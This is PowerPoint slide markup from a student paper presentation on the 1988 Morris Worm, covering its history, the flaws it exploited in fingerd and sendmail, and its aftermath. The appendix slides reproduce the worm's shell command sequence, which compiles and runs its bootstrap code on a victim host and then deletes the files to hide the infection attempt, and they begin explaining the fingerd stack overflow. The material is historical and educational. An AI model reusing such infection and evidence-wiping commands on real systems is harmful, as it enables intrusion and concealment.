            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187394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de-DE" dirty="0" err="1"/>
              <a:t>Thank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>You</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Textplatzhalter 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Timo Strauch &amp; Sebastian Poth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263075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Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Foliennummernplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Fußzeilenplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Paper Presentation – Distributed Information Processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rechteck 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668592" y="1404130"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rechteck 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="1350818"/>
            <a:ext cx="7920992" cy="736490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="00336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History</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rechteck 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669866" y="2317984"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rechteck 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="2256875"/>
            <a:ext cx="7920992" cy="1322172"/>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Foundations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="978637" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Worm vs. Virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="978637" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flaws of the Systems: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Finger(d), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, Passwords, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trusted Logins</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rechteck 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669866" y="3809723"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rechteck 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="3748614"/>
            <a:ext cx="7920992" cy="1321200"/>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521437">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Functionality of the Morris Worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="978637" lvl="1" indent="-457200" defTabSz="521437">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>High-Level Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="978637" lvl="1" indent="-457200" defTabSz="521437">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Detailed Functionalities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rechteck 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668592" y="5298878"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rechteck 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608042" y="5239381"/>
            <a:ext cx="7920992" cy="735006"/>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Aftermath</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35395540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Literature:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>[1] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cisco.com/c/en/us/about/security-center/virus-differences.html</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>[2] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.businessinsider.com/why-robert-morris-didnt-go-to-jail-2013-1</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4285181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Appendix I – Call of the Main Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server worm send the following command</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>stream to the connected shell:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then it would send the following form of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>command sequence: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” succeed only if the linked version of the worm failed to execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the server determined that the host was now infected, it closed the connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Otherwise, it would try the other binary file. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After both binary files had been tried, it would send over “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” commands for the object files to clear away all evidence of the attempt at infection </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Foliennummernplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Textfeld 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7738872" y="1193506"/>
            <a:ext cx="3701143" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="003366"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PATH=/bin:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bin:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</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ucb</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if [ -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> |</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>P=x14481910</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>P=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Textfeld 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="597408" y="2961152"/>
            <a:ext cx="4803648" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="003366"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cc -o $P x11481910,sun3.o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./$P -p $$ x14481910,sun3.o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	x14481910,vax.o x14481910,11.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -f $P</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3199233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Appendix II – Details of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Fingerd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Flaw</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The instructions that were written into</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the stack at that location were: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That is, the code executed when the main routine attempted to return was:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On VAXs, this resulted in the worm connected to a remote shell via the TCP connection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Textfeld 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6281057" y="1193506"/>
            <a:ext cx="3701143" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="003366"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
